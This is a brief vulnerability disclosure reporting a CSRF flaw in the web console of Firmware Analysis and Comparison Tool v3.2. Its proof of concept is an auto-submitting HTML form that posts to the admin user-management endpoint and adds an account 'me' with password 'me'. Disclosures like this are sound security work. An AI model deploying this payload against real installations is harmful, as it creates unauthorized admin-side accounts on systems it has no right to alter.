Attacks: CSRF

Product: Firmware Analysis and Comparison Tool

Affected Version(s):v3.2

Proof of Concept:

1. FACT web console allow CSRF attacks

   

2. Attacker could host a web page to send HTTP request.

   <!-- Add new user-->
   
   <html>
   <body>
   <form id="CSRF" action="<http://192.168.1.118:5000/admin/manage_users>" method="POST">
   <input type="hidden" name="username" value="me" />
   <input type="hidden" name="password1" value="me"/>
   <input type="hidden" name="password2"value="me"/>
   <script>
   	document.getElementById('CSRF').submit();
   </script>
   </form>
   </body>
   </html>
   

   

3. New user “me” has been added by CSRF attacks